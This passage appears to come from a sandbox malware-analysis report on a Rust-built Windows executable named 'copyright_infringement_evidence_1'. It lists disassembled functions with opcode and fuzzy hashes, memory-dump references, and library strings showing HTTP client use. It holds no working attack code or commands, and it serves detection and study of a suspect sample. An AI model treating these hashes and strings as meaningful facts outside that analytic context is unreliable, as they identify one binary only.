                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrngProcessmemmove
                                                                                                          • String ID: called `Result::unwrap()` on an `Err` value$invalid initial remote window sizeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\proto\streams\recv.rs
                                                                                                          • API String ID: 749585221-2152796985
                                                                                                          • Opcode ID: 4983633bb2efc0da70cb224faa5a448862a475820e6bd753c28a177f1e8781c8
                                                                                                          • Instruction ID: dc01fd86ac17d532e7b7d1eb0308b38523e3d0e04a9aec285df276ee904a6d78
                                                                                                          • Opcode Fuzzy Hash: 4983633bb2efc0da70cb224faa5a448862a475820e6bd753c28a177f1e8781c8
                                                                                                          • Instruction Fuzzy Hash: 3F917932909BC186E3649F14F4443ABB7A0FB84748F515229EBC907BA5DFBDE199CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF7A18B6DCA
                                                                                                          • assertion failed: len >= mem::size_of::<c::sockaddr_in>()library\std\src\sys_common\net.rs, xrefs: 00007FF7A18B6DB2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastgetpeername
                                                                                                          • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()library\std\src\sys_common\net.rs
                                                                                                          • API String ID: 2962421750-513854611
                                                                                                          • Opcode ID: 04c9919983a2bd7e045bd0c29484ee779f7db7eeb4878be004ee4b19ecf9c02a
                                                                                                          • Instruction ID: 5408b7eb779d7c8d910ce070e59353ee3835d432997a2eb64e1bde5cc6e212b4
                                                                                                          • Opcode Fuzzy Hash: 04c9919983a2bd7e045bd0c29484ee779f7db7eeb4878be004ee4b19ecf9c02a
                                                                                                          • Instruction Fuzzy Hash: 3731C221D096D28AF325AFA4E4012FCB371FF44328F999135EA8906660FB7DA6D5CB50
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: FieldSet corrupted (this is a bug)
                                                                                                          • API String ID: 2162964266-3324409646
                                                                                                          • Opcode ID: d2328cc2ece35772c1979d6df544b68549ffc2557944e3429719f2ad3fafc881
                                                                                                          • Instruction ID: 15b711e03c9f3edacb90e79ea61706b0becbc2c9aa323287f2ded687f13dea25
                                                                                                          • Opcode Fuzzy Hash: d2328cc2ece35772c1979d6df544b68549ffc2557944e3429719f2ad3fafc881
                                                                                                          • Instruction Fuzzy Hash: 78224C3290EBC680F7719B04E4403EAA3A4FB95754F815175DACC06BAADFBCE5A5CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcmp
                                                                                                          • String ID: <Uri as Dst>::host should have a str
                                                                                                          • API String ID: 1475443563-97915983
                                                                                                          • Opcode ID: 396efc886e0e7f375c7652995e31090d199183fd4ad8f1f1bd49f7ea848df7e7
                                                                                                          • Instruction ID: c68ca4a0d92da16cad5d473e0054cbc4fb172d8176c44327ed1f5b0feff75286
                                                                                                          • Opcode Fuzzy Hash: 396efc886e0e7f375c7652995e31090d199183fd4ad8f1f1bd49f7ea848df7e7
                                                                                                          • Instruction Fuzzy Hash: 9EC1AC56E1F68289FB71AB109404B7A9B917F5A3D0F926936DD8D422E2CFBCD104CB20
                                                                                                          APIs
                                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,?,?,-8000000000000000,?,?,?,?,00007FF7A18CD018), ref: 00007FF7A1817BD2
                                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,?,?,-8000000000000000,?,?,?,?,00007FF7A18CD018), ref: 00007FF7A1817D5A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: """"""""$\\\\\\\\
                                                                                                          • API String ID: 2162964266-842421292
                                                                                                          • Opcode ID: 7fbe986667315c8a7e3938de597fc03824ebfc1de7d78e77975d484229cd0bb6
                                                                                                          • Instruction ID: 46f5e54ff5f69865c34ebb960c464b00cdfd7fcb420767c273320015a8df076e
                                                                                                          • Opcode Fuzzy Hash: 7fbe986667315c8a7e3938de597fc03824ebfc1de7d78e77975d484229cd0bb6
                                                                                                          • Instruction Fuzzy Hash: 75C1A157B0AB8581FB00AB51E4486BAA391FB45BE0FC68676DE8D077A0DFBCE154C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove$memset
                                                                                                          • String ID: assertion failed: head.len() + tail.len() <= 8
                                                                                                          • API String ID: 3790616698-823364291
                                                                                                          • Opcode ID: e7aba9500aac835c56d35c3a97eb79cc1eeb2d28c82ff1e27f8ec9b880e054c0
                                                                                                          • Instruction ID: f394814224a6f3c968883e7ee5904ac5cf8d3268d571e457c1d14e335bde2026
                                                                                                          • Opcode Fuzzy Hash: e7aba9500aac835c56d35c3a97eb79cc1eeb2d28c82ff1e27f8ec9b880e054c0
                                                                                                          • Instruction Fuzzy Hash: 44710B23E2A78341FB11A625D1006B9D312AF527B0FC68776EACC136E1FFADD5648B10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: size overflows MAX_SIZE
                                                                                                          • API String ID: 2162964266-46708182
                                                                                                          • Opcode ID: 7464fe0e8bb4a800287c3baef077f9c916d3b3bb274b3e18da70d8f8bd33f911
                                                                                                          • Instruction ID: ea1c4fcbde2d7abd53636c301a7c7e300c9b30ad56d3640446b3b76ac76127a1
                                                                                                          • Opcode Fuzzy Hash: 7464fe0e8bb4a800287c3baef077f9c916d3b3bb274b3e18da70d8f8bd33f911
                                                                                                          • Instruction Fuzzy Hash: 74514A3261ABC581E7629B15F8417EAA364FB89794F805121EECC03B69DF7CE295CB10
                                                                                                          Strings
                                                                                                          • https, xrefs: 00007FF7A17A0BAC
                                                                                                          • httpInvalidUriCharInvalidSchemeInvalidAuthorityInvalidPortInvalidFormatSchemeMissingAuthorityMissingPathAndQueryMissingTooLongEmptySchemeTooLongOut of bounds access/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\collections\vec_deque\mod.rs, xrefs: 00007FF7A17A0BA5
                                                                                                          • NO_PROXYno_proxyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\reqwest-0.11.27\src\proxy.rsunknown proxy scheme, xrefs: 00007FF7A17A0CEC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: NO_PROXYno_proxyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\reqwest-0.11.27\src\proxy.rsunknown proxy scheme$httpInvalidUriCharInvalidSchemeInvalidAuthorityInvalidPortInvalidFormatSchemeMissingAuthorityMissingPathAndQueryMissingTooLongEmptySchemeTooLongOut of bounds access/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\collections\vec_deque\mod.rs$https
                                                                                                          • API String ID: 0-3703667939
                                                                                                          • Opcode ID: 7606af79b796ed76097a02b8d61cc910687b325fcf36e5ae796581c090d0770a
                                                                                                          • Instruction ID: a0cd5c1e0015da28236e43a6539e3a434113ea33297009e520f8fee888387deb
                                                                                                          • Opcode Fuzzy Hash: 7606af79b796ed76097a02b8d61cc910687b325fcf36e5ae796581c090d0770a
                                                                                                          • Instruction Fuzzy Hash: 0041451AA1A74285FB51AB1594003F9E350BF59BD0FC65632EE4C637A2EFBCE185C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • reqwest::blocking::clientsignaled close for runtime thread (, xrefs: 00007FF7A1795A7E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: reqwest::blocking::clientsignaled close for runtime thread (
                                                                                                          • API String ID: 2162964266-650935842
                                                                                                          • Opcode ID: 06c294a5641f9a7671eccea3c94ed01bd97e64dc4cb0929c2585eb26b8e4af25
                                                                                                          • Instruction ID: b1c45f367755f00692dfdaa8ae80e3fbe7f3c1f429f64f8ddbf0401aa6243e1a
                                                                                                          • Opcode Fuzzy Hash: 06c294a5641f9a7671eccea3c94ed01bd97e64dc4cb0929c2585eb26b8e4af25
                                                                                                          • Instruction Fuzzy Hash: 0751313261ABC680F7A1EB15E4403EEB764E749790F851036DA8D077A6DFBDE154CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: kind$reqwest::Error$urlsourcebuilder errorerror sending requesterror following redirectHTTP status server errorHTTP status client error ()
                                                                                                          • API String ID: 2162964266-3440237524
                                                                                                          • Opcode ID: 14c4670e9262e43ec059299ba168479cae3b49f7e73be4f64ee8eaaa836814c2
                                                                                                          • Instruction ID: b0840fdfebc182b606266b8232d8f61bfd8100ced99a54fde6997f6628649d03
                                                                                                          • Opcode Fuzzy Hash: 14c4670e9262e43ec059299ba168479cae3b49f7e73be4f64ee8eaaa836814c2
                                                                                                          • Instruction Fuzzy Hash: 0041B421A0B75241FB50BB11E8017B9A690EF897A4FC65071ED4C0B7B2DEBCE656CB20
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.9\src\lib.rsinternal error: entered unreachable code, xrefs: 00007FF7A1842CEC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.9\src\lib.rsinternal error: entered unreachable code
                                                                                                          • API String ID: 2162964266-1371425751
                                                                                                          • Opcode ID: 352db836c53a034e1b4fde38fbfd72e52375b79a49fb09b233d503300898de2b
                                                                                                          • Instruction ID: 071e33da124e6b6f8c2761b3cea392b0736878f0d0671f5c9ceb8ac819cdb802
                                                                                                          • Opcode Fuzzy Hash: 352db836c53a034e1b4fde38fbfd72e52375b79a49fb09b233d503300898de2b
                                                                                                          • Instruction Fuzzy Hash: 1741B03660AA8585FB70AB11E4407EEA365FB85BA4F824072DE8C437A5CF7CE455CB60
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.9\src\lib.rsinternal error: entered unreachable code, xrefs: 00007FF7A184EB59
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.9\src\lib.rsinternal error: entered unreachable code
                                                                                                          • API String ID: 2162964266-1371425751
                                                                                                          • Opcode ID: edf025a60a6aea30d402204a18a853339b904ca1180ff723e5d4232dcbd63791
                                                                                                          • Instruction ID: b26c109d4ae962e26ff200263645720e5291bba9702f4a3b113601f2012a6f7e
                                                                                                          • Opcode Fuzzy Hash: edf025a60a6aea30d402204a18a853339b904ca1180ff723e5d4232dcbd63791
                                                                                                          • Instruction Fuzzy Hash: 7631A432B06B4291FB24AF11E441368B3A0FB55794F868432CB9D07BA1DFBCE4A1C720
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.9\src\lib.rsinternal error: entered unreachable code, xrefs: 00007FF7A1796FB9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.9\src\lib.rsinternal error: entered unreachable code
                                                                                                          • API String ID: 2162964266-1371425751
                                                                                                          • Opcode ID: e7b573b9f2347f556f9d60bb7cdec34d093eefc2f991de152fb7f6a0a726b86e
                                                                                                          • Instruction ID: ae5f3c5a4e4853cd6b2db7eb99c721e4725f32267d79b7c553229e1bcc78a3b2
                                                                                                          • Opcode Fuzzy Hash: e7b573b9f2347f556f9d60bb7cdec34d093eefc2f991de152fb7f6a0a726b86e
                                                                                                          • Instruction Fuzzy Hash: AD31C032B06B0291FB64AF11E5407A8A3A1FB49790FC14531EB5D07BA1DFBCE5A5C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • Flatten polled after completionC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.30\src\future\future\flatten.rs, xrefs: 00007FF7A17BA436
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: Flatten polled after completionC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.30\src\future\future\flatten.rs
                                                                                                          • API String ID: 2162964266-3884221160
                                                                                                          • Opcode ID: 9bfcc98898b362e9ca8a679113ba7bdd88d1e498f7f3878a46595be988ae26aa
                                                                                                          • Instruction ID: 991a6b28d2fe56fc0a622802561e7e1aef9b87ace7b4ba449366a8c04ee13375
                                                                                                          • Opcode Fuzzy Hash: 9bfcc98898b362e9ca8a679113ba7bdd88d1e498f7f3878a46595be988ae26aa
                                                                                                          • Instruction Fuzzy Hash: C731D322B1A64290FB10FB02E8043B9A650BB56BD4FC98071DE5E07BA2DFBCE155CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFrequencyLastPerformanceQuery
                                                                                                          • String ID: called `Result::unwrap()` on an `Err` value
                                                                                                          • API String ID: 3362413890-2333694755
                                                                                                          • Opcode ID: 65b5200f8505c8282ea0287a2df7cc38b718c5842e949790bcc9f368fd7272dd
                                                                                                          • Instruction ID: 2f47c37c681e227233c83d926a18cb7239a823ad44cab70c6b643d9d78f3b96c
                                                                                                          • Opcode Fuzzy Hash: 65b5200f8505c8282ea0287a2df7cc38b718c5842e949790bcc9f368fd7272dd
                                                                                                          • Instruction Fuzzy Hash: CB315A61F0AB4681FB08EBA5A8012FDA365BB84BA4F85C136CD1E037A4DF7C9566C710
                                                                                                          Strings
                                                                                                          • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF7A18A1404
                                                                                                          • lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 00007FF7A18A141C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
